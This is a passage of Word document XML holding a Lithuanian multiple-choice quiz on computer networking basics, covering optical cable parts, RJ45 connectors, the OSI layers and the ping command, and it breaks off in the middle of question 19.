        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="511C2453" w14:textId="141813E0" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>14. Kokio komponento nėra optinio kabelio sandaroje</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA5620" w14:textId="525C02ED"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a) </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ptinio pluošto</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6D887" w14:textId="0EC6348F"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b) </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ntgalio</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759D70C8" w14:textId="011E18AD"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c) </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>arinės gyslos</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A3691A" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FC9C46" w14:textId="6467B63B" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>15. Kaip vadinasi jungtis</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>naudojama antgaliams vytos poros kabeliuose?</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D03E764" w14:textId="525BAEBF" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) R45</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D0EFDA" w14:textId="224BC4BB" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) RJ45</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8E2FDF" w14:textId="4FC710A0" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c) R55</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FA0C6C" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CCF6843" w14:textId="346A7BB5" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">16. Kiek </w:t>
      </w:r>
      <w:r w:rsidR="000739BA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>sluoksnių</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> aprašo OSI modelis?</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDF9BB3" w14:textId="763025F3" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) 5</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C64CED6" w14:textId="302CC800" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) 7</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625FB30B" w14:textId="4101710E" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>c) 6</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0DEA84" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C649BE5" w14:textId="6AF11399" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">17. </w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Nurodykite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>pagrindin</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ę</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> komandos </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> funkcij</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABD4D14" w14:textId="6B98360F"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a) </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ustatyti, ar įrenginys yra pasiekiamas</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kompiuterių tinkl</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ą;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42A42D" w14:textId="6586DFDB"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b) </w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ustatyti, ar įrenginys yra prijungtas nuotoliniu būdu</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A116C1" w14:textId="6DD98280"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c) </w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>arodyti protokolo statistiką</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18405385" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF2E419" w14:textId="5311B363" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>18. Kuris iš OSI modelio lygių aprašo ryšį tarp gretimų (tiesiogiai bendraujančių) tinklo komponentų?</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2561D6" w14:textId="498B89EB"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a) </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>izinis</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E26FE8C" w14:textId="452FEA27" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>yšio (kanalinis)</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79001659" w14:textId="68BAEA5B" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="00454522" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">c) </w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ransporto</w:t>
      </w:r>
      <w:r w:rsidR="00BC1B53" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44887056" w14:textId="77777777" w:rsidR="005D4796" w:rsidRPr="005A5C28" w:rsidRDefault="005D4796" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44177A14" w14:textId="44115E87" w:rsidR="00454522" w:rsidRPr="005A5C28" w:rsidRDefault="005871AC" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidR="00454522" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. Su k</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>uria iš pateiktų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00454522" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>komand</w:t>
      </w:r>
      <w:r w:rsidR="00FB2EDE" w:rsidRPr="005A5C28">
